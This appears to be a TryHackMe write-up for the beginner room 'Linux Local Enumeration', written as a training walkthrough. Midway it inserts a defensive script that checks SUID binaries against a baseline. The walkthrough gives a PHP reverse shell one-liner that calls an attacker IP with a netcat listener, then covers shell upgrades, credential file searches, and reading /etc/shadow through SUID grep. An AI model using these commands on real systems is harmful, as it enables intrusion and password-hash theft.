This is the write-up for the room Linux Local Enumeration on TryHackMe, which is part of the Complete Beginner path.
Connect to the TryHackMe lab environment through the VPN or use the AttackBox on the TryHackMe site.
Tasks Linux Local Enumeration
Task 1
Read all that is in the task and start the machine attached to this task.
Connect to the machine by navigating to MACHINE_IP:3000 in Firefox.
I’m using method one
Start a listener in a terminal by typing
nc -nlvp 4444
Navigate to MACHINE_IP:3000/cmd
Put in the following (change the IP to your tun0 IP)
php -r '$sock=fsockopen("10.9.135.33",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
You now have a shell. Upgrade the shell by typing in
python3 -c 'import pty; pty.spawn("/bin/bash")'
Task 2
2.1 How would you execute /bin/bash with perl?
Google perl bin bash shell. I came across this site
Spawning a TTY Shell (netsec.ws)
Answer: perl -e 'exec "/bin/bash";'
Task 3
3.1 Where can you usually find the id_rsa file? (User = user)
Answer: /home/user/.ssh/id_rsa
3.2 Is there an id_rsa file on the box? (yay/nay)
In the shell navigate to .ssh
Answer: nay
Task 4
4.1 How would you print machine hardware name only?
Answer: uname -m
4.2 Where can you find bash history?
Answer: ~/.bash_history
4.3 What’s the flag?
Type in
cat .bash_history
The flag is in this file. Just read the history
Task 5
Read all that is in the task
5.1 Can you read /etc/passwd on the box? (yay/nay)
Type in the command
cat /etc/passwd
Answer: yay
Task 6
Read all that is in the task
6.1 What’s the password you found?
Navigate to the root directory, then type in the following command
find -type f -name "*.bak" 2>/dev/null
cat the correct file and notice the password
6.2 Did you find a flag?
Type in the command
find -type f -name "*.conf" 2>/dev/null
There is a very long list, but look closer and you will find
./etc/sysconf/flag.conf
Cat this file to the screen and you will see the flag
Task 7
7.1 Which SUID binary has a way to escalate your privileges on the box?
Type in the command
find / -perm -u=s -type f 2>/dev/null
If we look through the list on GTFOBins we find grep
Answer: grep
7.2 What’s the payload you can use to read /etc/shadow with this SUID?
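Because grep has the SUID bit set, it runs with its owner's privileges (root) and can read files that only root can read.
Answer: grep '' /etc/shadow
You now see the contents of /etc/shadow, including the password hashes.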
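From the defender's side, the output of the same find command can be checked against a baseline so that an unexpected SUID binary such as grep stands out. This is an added example, not part of the room or of the original write-up; the baseline paths are an assumption and the sample find output is constructed.

```bash
#!/usr/bin/env bash
# Added example: flag SUID binaries that are not in an expected baseline.

# ASSUMPTION: allowlist of binaries that normally ship SUID-root on a stock
# Debian/Ubuntu install. Replace it with the list from your own golden image.
BASELINE="/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd"

# Reads one path per line on stdin and prints every path missing from BASELINE.
# Matching is on the full path, so a look-alike name elsewhere is still flagged.
unexpected_suid() {
    local path
    while IFS= read -r path; do
        if [ -z "$path" ]; then continue; fi
        if ! printf '%s\n' "$BASELINE" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# CONSTRUCTED sample of `find / -perm -u=s -type f` output (not from the lab box).
sample_find_output() {
    cat <<'EOF'
/usr/bin/passwd
/usr/bin/sudo
/bin/grep
/usr/bin/su
/opt/tools/passwd
EOF
}

# Demo on the constructed sample. On a real host, run instead:
#   find / -perm -u=s -type f 2>/dev/null | unexpected_suid
sample_find_output | unexpected_suid
```

Any path it prints should either be added to the baseline deliberately or have the bit removed with chmod u-s.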
Task 8
Use both commands on your machine to see the results, then press complete
Task 9
Notice the two scripts, LinPEAS and LinEnum. There are also Windows versions of these tools to run on Windows platforms.
Press complete
Task 10
Read all that is in the task and press complete